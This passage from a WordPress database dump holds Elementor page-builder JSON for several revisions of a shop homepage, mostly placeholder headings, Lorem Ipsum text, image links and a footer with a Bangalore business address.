leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8372,1470,'_elementor_page_assets','a:0:{}'),(8375,1471,'_elementor_edit_mode','builder'),(8376,1471,'_elementor_template_type','wp-page'),(8377,1471,'_elementor_version','3.7.7'),(8378,1471,'_wp_page_template','elementor_canvas'),(8379,1471,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"},{\"_id\":\"470f418\",\"text\":\"List Item\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"}}]},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8380,1471,'_elementor_page_assets','a:0:{}'),(8382,1472,'_elementor_edit_mode','builder'),(8383,1472,'_elementor_template_type','wp-page'),(8384,1472,'_elementor_version','3.7.7'),(8385,1472,'_wp_page_template','elementor_canvas'),(8386,1472,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\